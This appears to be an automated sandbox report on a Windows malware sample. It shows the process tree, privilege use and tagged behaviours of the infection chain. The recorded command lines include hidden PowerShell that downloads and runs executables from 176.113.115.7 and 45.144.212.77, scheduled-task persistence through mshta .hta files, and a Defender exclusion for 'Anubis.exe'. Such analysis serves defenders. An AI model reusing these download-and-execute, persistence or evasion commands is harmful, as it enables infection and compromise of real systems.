pid Process 1100 powershell.exe 1100 powershell.exe 1100 powershell.exe 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 2144 rapes.exe 1616 ce4pMzk.exe 1616 ce4pMzk.exe 1616 ce4pMzk.exe 1616 ce4pMzk.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 1464 TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE 2392 powershell.exe 2228 powershell.exe 3008 powershell.exe 1976 powershell.exe 1976 powershell.exe 1976 powershell.exe 1740 powershell.exe 2724 powershell.exe 3008 powershell.exe 3008 powershell.exe 1532 483d2fa8a0d53818306efeb32d3.exe 1524 ktxzLhN.exe 1524 ktxzLhN.exe 1564 dll32.exe 880 3178e88ae0.exe 2292 c39706eca6.exe 1192 f0d7603e98.exe 2692 cccfebf586.exe 2852 1fc666ec69.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 3356 80a506a4b9.exe 3356 80a506a4b9.exe 3356 80a506a4b9.exe 3356 80a506a4b9.exe 3736 ktxzLhN.exe 3736 ktxzLhN.exe 3828 dll32.exe -
Suspicious use of AdjustPrivilegeToken 54 IoCs
description pid Process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 1616 ce4pMzk.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 1524 ktxzLhN.exe Token: SeDebugPrivilege 1564 dll32.exe Token: SeDebugPrivilege 2916 777e11d160.exe Token: SeDebugPrivilege 2092 tasklist.exe Token: SeDebugPrivilege 2688 tasklist.exe Token: SeDebugPrivilege 1176 tasklist.exe Token: SeDebugPrivilege 2676 tasklist.exe Token: SeDebugPrivilege 1996 tasklist.exe Token: SeDebugPrivilege 2120 tasklist.exe Token: SeDebugPrivilege 1660 tasklist.exe Token: SeDebugPrivilege 2392 tasklist.exe Token: SeDebugPrivilege 2268 tasklist.exe Token: SeDebugPrivilege 2976 tasklist.exe Token: SeDebugPrivilege 1040 tasklist.exe Token: SeDebugPrivilege 2356 tasklist.exe Token: SeDebugPrivilege 1508 tasklist.exe Token: SeDebugPrivilege 3008 tasklist.exe Token: SeDebugPrivilege 1700 tasklist.exe Token: SeDebugPrivilege 1084 tasklist.exe Token: SeDebugPrivilege 2528 tasklist.exe Token: SeDebugPrivilege 2180 taskkill.exe Token: SeDebugPrivilege 2468 tasklist.exe Token: SeDebugPrivilege 1220 tasklist.exe Token: SeDebugPrivilege 2156 taskkill.exe Token: SeDebugPrivilege 2448 tasklist.exe Token: SeDebugPrivilege 2904 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeDebugPrivilege 792 taskkill.exe Token: SeDebugPrivilege 1676 firefox.exe Token: SeDebugPrivilege 1676 firefox.exe Token: SeDebugPrivilege 396 tasklist.exe Token: SeDebugPrivilege 3132 tasklist.exe Token: SeDebugPrivilege 3304 tasklist.exe Token: SeDebugPrivilege 3508 tasklist.exe Token: SeDebugPrivilege 3560 tasklist.exe Token: SeDebugPrivilege 3356 80a506a4b9.exe Token: SeDebugPrivilege 3644 tasklist.exe Token: SeDebugPrivilege 3760 tasklist.exe Token: SeDebugPrivilege 3736 ktxzLhN.exe Token: SeDebugPrivilege 3828 dll32.exe Token: SeDebugPrivilege 3880 tasklist.exe Token: SeDebugPrivilege 3936 tasklist.exe Token: SeDebugPrivilege 3996 tasklist.exe Token: SeDebugPrivilege 4072 tasklist.exe Token: SeDebugPrivilege 3132 tasklist.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 848 68271cbb99.exe 848 68271cbb99.exe 848 68271cbb99.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 1676 firefox.exe 1676 firefox.exe 1676 firefox.exe 1676 firefox.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 848 68271cbb99.exe 848 68271cbb99.exe 848 68271cbb99.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 1676 firefox.exe 1676 firefox.exe 1676 firefox.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe 956 a9c3a998e8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2212 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 30 PID 2328 wrote to memory of 2212 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 30 PID 2328 wrote to memory of 2212 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 30 PID 2328 wrote to memory of 2212 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 30 PID 2328 wrote to memory of 2220 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 31 PID 2328 wrote to memory of 2220 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 31 PID 2328 wrote to memory of 2220 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 31 PID 2328 wrote to memory of 2220 2328 f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe 31 PID 2212 wrote to memory of 2084 2212 cmd.exe 33 PID 2212 wrote to memory of 2084 2212 cmd.exe 33 PID 2212 wrote to memory of 2084 2212 cmd.exe 33 PID 2212 wrote to memory of 2084 2212 cmd.exe 33 PID 2220 wrote to memory of 1100 2220 mshta.exe 34 PID 2220 wrote to memory of 1100 2220 mshta.exe 34 PID 2220 wrote to memory of 1100 2220 mshta.exe 34 PID 2220 wrote to memory of 1100 2220 mshta.exe 34 PID 1100 wrote to memory of 2852 1100 powershell.exe 37 PID 1100 wrote to memory of 2852 1100 powershell.exe 37 PID 1100 wrote to memory of 2852 1100 powershell.exe 37 PID 1100 wrote to memory of 2852 1100 powershell.exe 37 PID 2852 wrote to memory of 2144 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 38 PID 2852 wrote to memory of 2144 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 38 PID 2852 wrote to memory of 2144 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 38 PID 2852 wrote to memory of 2144 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 38 PID 2144 wrote to memory of 1616 2144 rapes.exe 40 PID 2144 wrote to memory of 1616 2144 rapes.exe 40 PID 2144 wrote to memory of 1616 2144 rapes.exe 40 PID 2144 wrote to memory of 1616 2144 rapes.exe 40 PID 2144 wrote to memory of 848 2144 rapes.exe 41 PID 2144 wrote to memory of 848 2144 rapes.exe 41 PID 2144 wrote to memory of 848 2144 rapes.exe 41 PID 2144 wrote to memory of 848 2144 rapes.exe 41 PID 848 wrote to memory of 1096 848 68271cbb99.exe 42 PID 848 wrote to memory of 1096 848 68271cbb99.exe 42 PID 848 wrote to memory of 1096 848 68271cbb99.exe 42 PID 848 wrote to memory of 1096 848 68271cbb99.exe 42 PID 848 wrote to memory of 2608 848 68271cbb99.exe 43 PID 848 wrote to memory of 2608 848 68271cbb99.exe 43 PID 848 wrote to memory of 2608 848 68271cbb99.exe 43 PID 848 wrote to memory of 2608 848 68271cbb99.exe 43 PID 1096 wrote to memory of 840 1096 cmd.exe 45 PID 1096 wrote to memory of 840 1096 cmd.exe 45 PID 1096 wrote to memory of 840 1096 cmd.exe 45 PID 1096 wrote to memory of 840 1096 cmd.exe 45 PID 2608 wrote to memory of 2156 2608 mshta.exe 46 PID 2608 wrote to memory of 2156 2608 mshta.exe 46 PID 2608 wrote to memory of 2156 2608 mshta.exe 46 PID 2608 wrote to memory of 2156 2608 mshta.exe 46 PID 2156 wrote to memory of 1464 2156 powershell.exe 48 PID 2156 wrote to memory of 1464 2156 powershell.exe 48 PID 2156 wrote to memory of 1464 2156 powershell.exe 48 PID 2156 wrote to memory of 1464 2156 powershell.exe 48 PID 2144 wrote to memory of 268 2144 rapes.exe 49 PID 2144 wrote to memory of 268 2144 rapes.exe 49 PID 2144 wrote to memory of 268 2144 rapes.exe 49 PID 2144 wrote to memory of 268 2144 rapes.exe 49 PID 268 wrote to memory of 2016 268 cmd.exe 51 PID 268 wrote to memory of 2016 268 cmd.exe 51 PID 268 wrote to memory of 2016 268 cmd.exe 51 PID 268 wrote to memory of 2016 268 cmd.exe 51 PID 268 wrote to memory of 1604 268 cmd.exe 52 PID 268 wrote to memory of 1604 268 cmd.exe 52 PID 268 wrote to memory of 1604 268 cmd.exe 52 PID 268 wrote to memory of 1604 268 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2084
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE"C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\pDcYrl4C\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe"C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:840
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE"C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "fFWMJmaUaQB" /tr "mshta \"C:\Temp\dGUhPFzXc.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2812
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\dGUhPFzXc.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\dll32.exe"C:\Users\Admin\AppData\Local\Temp\dll32.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat8⤵PID:2460
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:2228
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2236
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:1240
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2976
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2852
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2776
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2404
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1148
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:1404
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2208
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2524
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:920
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2568
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2032
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2592
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1716
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2260
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2828
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:3048
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1860
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:580
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1780
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:944
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:3052
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:840
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2912
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:880
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2500
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2192
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:836
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2628
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1416
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2060
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2012
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:344
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1716
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:1504
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:1512
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:1236
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:380
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:2696
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:2384
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:840
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1564"9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\system32\find.exefind ":"9⤵PID:3140
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak9⤵
- Delays execution with timeout.exe
PID:3172
-
-
